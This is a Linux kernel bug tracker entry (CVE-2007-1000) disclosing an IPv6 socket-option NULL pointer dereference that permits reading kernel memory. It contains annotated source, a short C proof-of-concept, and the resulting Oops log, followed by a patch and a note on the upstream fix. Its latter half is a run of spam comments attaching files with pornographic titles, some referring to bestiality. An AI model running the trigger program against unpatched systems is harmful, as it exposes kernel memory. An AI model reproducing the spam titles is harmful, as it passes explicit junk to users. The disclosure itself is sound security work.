Bug 8134 - ArbitrarayKernel memory leak
Summary: ArbitrarayKernel memory leak
Status: CLOSED CODE_FIX
Alias: None
Product: Networking
Classification: Unclassified
Component: IPV6 (show other bugs)
Hardware: i386 Linux
: P2 high
Assignee: Chris Wright
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2007-03-06 03:07 UTC by Anonymous
Modified: 2007-04-05 23:11 UTC (History)
1 user (show)

See Also:
Kernel Version: 2.6.17-11 (Ubuntu kernel)
Subsystem:
Regression: ---
Bisected commit-id:


Attachments
IPV6: make ipv6_getsockopt_sticky handle possible NULL ptr (1.66 KB, patch)
2007-03-07 17:16 UTC, Chris Wright
Details | Diff
asdasd (3.92 KB, text/html)
2007-04-05 00:51 UTC, member
Details
annunci-sesso (4.93 KB, text/html)
2007-04-05 23:02 UTC, member
Details
bellucci-hard-sesso (5.62 KB, text/html)
2007-04-05 23:03 UTC, member
Details
casalinghe-puttane-gratis (2.73 KB, text/html)
2007-04-05 23:03 UTC, member
Details
cazzi (3.25 KB, text/html)
2007-04-05 23:03 UTC, member
Details
cazzo-de (2.82 KB, text/html)
2007-04-05 23:03 UTC, member
Details
cicciolina-sesso-con-animal (5.06 KB, text/html)
2007-04-05 23:04 UTC, member
Details
donne-uomini (3.39 KB, text/html)
2007-04-05 23:04 UTC, member
Details
forum-sesso (4.48 KB, text/html)
2007-04-05 23:04 UTC, member
Details
foto-lesbiche-che-si-leccano (3.38 KB, text/html)
2007-04-05 23:05 UTC, member
Details
foto-sesso-gay-gratis (5.06 KB, text/html)
2007-04-05 23:05 UTC, member
Details
frenulo-pene (4.66 KB, text/html)
2007-04-05 23:05 UTC, member
Details
gallerie-lesbiche (3.26 KB, text/html)
2007-04-05 23:05 UTC, member
Details
giochi-porno (4.22 KB, text/html)
2007-04-05 23:06 UTC, member
Details
le-donne (4.60 KB, text/html)
2007-04-05 23:06 UTC, member
Details
lesbiche-inculate (3.50 KB, text/html)
2007-04-05 23:06 UTC, member
Details
negras-follando (4.96 KB, text/html)
2007-04-05 23:06 UTC, member
Details
ragazze-gratis (4.54 KB, text/html)
2007-04-05 23:07 UTC, member
Details
ragazze-rumene (4.62 KB, text/html)
2007-04-05 23:07 UTC, member
Details
sesso-co-animali (4.49 KB, text/html)
2007-04-05 23:07 UTC, member
Details
sesso-con-cavallo-foto (4.60 KB, text/html)
2007-04-05 23:08 UTC, member
Details
sesso-gratis-matures (4.59 KB, text/html)
2007-04-05 23:08 UTC, member
Details
sesso-mature-gratis (4.45 KB, text/html)
2007-04-05 23:08 UTC, member
Details
sesso-trans-gratis (4.56 KB, text/html)
2007-04-05 23:08 UTC, member
Details
sesso-web (4.35 KB, text/html)
2007-04-05 23:09 UTC, member
Details
succhia-cazzo (2.36 KB, text/html)
2007-04-05 23:09 UTC, member
Details
super-pene (4.39 KB, text/html)
2007-04-05 23:09 UTC, member
Details
tette-spiaggia (3.36 KB, text/html)
2007-04-05 23:10 UTC, member
Details
tettone (2.75 KB, text/html)
2007-04-05 23:10 UTC, member
Details
video-pompini (3.11 KB, text/html)
2007-04-05 23:10 UTC, member
Details
video-tette (3.23 KB, text/html)
2007-04-05 23:11 UTC, member
Details
xnxx-sesso-gratuito (4.48 KB, text/html)
2007-04-05 23:11 UTC, member
Details

Description Anonymous 2007-03-06 03:07:08 UTC
There is a NULL pointer dereference which can lead to an arbitray kernel memory
leak, in the file net/ipv6/ipv6_sockglue.c :

340 	case IPV6_2292PKTOPTIONS:
341 	{
342 		struct ipv6_txoptions *opt = NULL;                        [1]
343 		struct msghdr msg;
344 		struct flowi fl;
345 		int junk;
346 
347 		fl.fl6_flowlabel = 0;
348 		fl.oif = sk->sk_bound_dev_if;
349 
340		if (optlen == 0)
341 			goto update;                                            [2]

377 update:
378 		retv = 0;
379 		if (inet_sk(sk)->is_icsk) {
380 			if (opt) {
...
389 			}
390 			opt = xchg(&np->opt, opt);                              [3]
391			sk_dst_reset(sk);
392		} else {
393			write_lock(&sk->sk_dst_lock);
394			opt = xchg(&np->opt, opt);                                [4]
395			write_unlock(&sk->sk_dst_lock);
396			sk_dst_reset(sk);
397		}

819	case IPV6_DSTOPTS:
820		{
821	
822			lock_sock(sk);
823			len = ipv6_getsockopt_sticky(sk, np->opt->hopopt,         [5]
824						     optval, len);
825			release_sock(sk);
826			return put_user(len, optlen);
827		}

In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and
optlen = 0 [2], np->opt is set to NULL [3][4].
In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np->opt is
dereferenced [5].

An attacker can read any portion of the kernel memory : ipv6_getsockopt_sticky()
copies np->opt->hopopt to optavl which is an user buffer, and np->opt can be
mmaped to NULL.

Here is a program that reproduces the bug :
#include <netinet/in.h>
int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen = 4;
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
  getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &optlen);
  return 0;
}

And the Oops output :
[17183522.904000] BUG: unable to handle kernel NULL pointer dereference at
virtual address 00000008
[17183522.904000]  printing eip:
[17183522.904000] f8eba4d4
[17183522.904000] *pde = 00000000
[17183522.904000] Oops: 0000 [#1]
[17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod
usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centr
ino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave
cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi
i2c_ec i2c_cor
e hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod
sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mi
i ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1
tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm
_oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc
soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 i
eee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic
thermal processor fan capability commoncap vesafb fbcon tileblit font bitbli
t softcursor
[17183522.904000] CPU:    0
[17183522.904000] EIP:    0060:[<f8eba4d4>]    Tainted: P      VLI
[17183522.904000] EFLAGS: 00210286   (2.6.17-11-386 #2) 
[17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6]
[17183522.904000] eax: 00000000   ebx: d33d1b00   ecx: d33d1f18   edx: d33d1f18
[17183522.904000] esi: 00000000   edi: 00000029   ebp: 0000003b   esp: dcd07d5c
[17183522.904000] ds: 007b   es: 007b   ss: 0068
[17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540)
[17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec
00000004 00000006 
[17183522.904000]        c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282
d33d1b00 00000000 
[17183522.904000]        d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000
f8c9a4ff 00000000 
[17183522.904000] Call Trace:
[17183522.904000]  <c025a68b> lock_sock+0xab/0xc0  <f8eba94b>
ipv6_setsockopt+0x16b/0xc40 [ipv6]
[17183522.904000]  <f8c92614> __ext3_journal_stop+0x24/0x50 [ext3]  <c0179c74>
__mark_inode_dirty+0x34/0x170
[17183522.904000]  <c013c78b> do_generic_mapping_read+0x42b/0x540  <c0154f74>
cache_alloc_refill+0x314/0x4d0
[17183522.904000]  <c0288da6> tcp_getsockopt+0x36/0x2b0  <c016f0b7>
d_alloc+0x27/0x190
[17183522.904000]  <c016f059> d_instantiate+0x49/0x80  <f8eba7e0>
ipv6_setsockopt+0x0/0xc40 [ipv6]
[17183522.904000]  <c0289966> tcp_setsockopt+0x36/0x370  <c0259de3>
sock_common_getsockopt+0x23/0x30
[17183522.904000]  <c025872e> sys_getsockopt+0x8e/0xc0  <c0259a44>
sys_socketcall+0x234/0x280
[17183522.904000]  <c02c7a00> do_page_fault+0x0/0x6e0  <c0102dbb>
sysenter_past_esp+0x54/0x79
[17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54
01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 <8b>
 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00 
[17183522.904000] EIP: [<f8eba4d4>] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP
0068:dcd07d5c
Comment 1 Chris Wright 2007-03-07 17:16:21 UTC
Created attachment 10647 [details]
IPV6: make ipv6_getsockopt_sticky handle possible NULL ptr

I don't believe this is a memory leak, rather a user triggerable NULL ptr deref

which will result in an Oops.  Patch attached closes the hole for me.
Comment 2 Chris Wright 2007-03-07 18:20:44 UTC
I am wrong, it is possible to read arbitrary kernel memory.
Comment 3 Chris Wright 2007-03-07 22:29:58 UTC
This is fixed upstream in 286930797d74b2c9a5beae84836044f6a836235f and will be
queued to -stable shortly.
Comment 4 Mark Cox 2007-03-08 00:52:18 UTC
CVE-2007-1000
Comment 5 member 2007-04-05 00:51:38 UTC
Created attachment 11053 [details]
asdasd

asdasd
Comment 6 member 2007-04-05 23:02:52 UTC
Created attachment 11054 [details]
annunci-sesso
Comment 7 member 2007-04-05 23:03:13 UTC
Created attachment 11055 [details]
bellucci-hard-sesso
Comment 8 member 2007-04-05 23:03:29 UTC
Created attachment 11056 [details]
casalinghe-puttane-gratis
Comment 9 member 2007-04-05 23:03:42 UTC
Created attachment 11057 [details]
cazzi
Comment 10 member 2007-04-05 23:03:54 UTC
Created attachment 11058 [details]
cazzo-de
Comment 11 member 2007-04-05 23:04:13 UTC
Created attachment 11059 [details]
cicciolina-sesso-con-animal
Comment 12 member 2007-04-05 23:04:31 UTC
Created attachment 11060 [details]
donne-uomini
Comment 13 member 2007-04-05 23:04:49 UTC
Created attachment 11061 [details]
forum-sesso
Comment 14 member 2007-04-05 23:05:05 UTC
Created attachment 11062 [details]
foto-lesbiche-che-si-leccano
Comment 15 member 2007-04-05 23:05:20 UTC
Created attachment 11063 [details]
foto-sesso-gay-gratis
Comment 16 member 2007-04-05 23:05:36 UTC
Created attachment 11064 [details]
frenulo-pene
Comment 17 member 2007-04-05 23:05:51 UTC
Created attachment 11065 [details]
gallerie-lesbiche
Comment 18 member 2007-04-05 23:06:16 UTC
Created attachment 11066 [details]
giochi-porno
Comment 19 member 2007-04-05 23:06:30 UTC
Created attachment 11067 [details]
le-donne
Comment 20 member 2007-04-05 23:06:44 UTC
Created attachment 11068 [details]
lesbiche-inculate
Comment 21 member 2007-04-05 23:06:59 UTC
Created attachment 11069 [details]
negras-follando
Comment 22 member 2007-04-05 23:07:13 UTC
Created attachment 11070 [details]
ragazze-gratis
Comment 23 member 2007-04-05 23:07:33 UTC
Created attachment 11071 [details]
ragazze-rumene
Comment 24 member 2007-04-05 23:07:49 UTC
Created attachment 11072 [details]
sesso-co-animali
Comment 25 member 2007-04-05 23:08:03 UTC
Created attachment 11073 [details]
sesso-con-cavallo-foto
Comment 26 member 2007-04-05 23:08:26 UTC
Created attachment 11074 [details]
sesso-gratis-matures
Comment 27 member 2007-04-05 23:08:39 UTC
Created attachment 11075 [details]
sesso-mature-gratis
Comment 28 member 2007-04-05 23:08:58 UTC
Created attachment 11076 [details]
sesso-trans-gratis
Comment 29 member 2007-04-05 23:09:25 UTC
Created attachment 11077 [details]
sesso-web
Comment 30 member 2007-04-05 23:09:39 UTC
Created attachment 11078 [details]
succhia-cazzo
Comment 31 member 2007-04-05 23:09:53 UTC
Created attachment 11079 [details]
super-pene
Comment 32 member 2007-04-05 23:10:10 UTC
Created attachment 11080 [details]
tette-spiaggia
Comment 33 member 2007-04-05 23:10:24 UTC
Created attachment 11081 [details]
tettone
Comment 34 member 2007-04-05 23:10:40 UTC
Created attachment 11082 [details]
video-pompini
Comment 35 member 2007-04-05 23:11:02 UTC
Created attachment 11083 [details]
video-tette
Comment 36 member 2007-04-05 23:11:20 UTC
Created attachment 11084 [details]
xnxx-sesso-gratuito

Note You need to log in before you can comment on or make changes to this bug.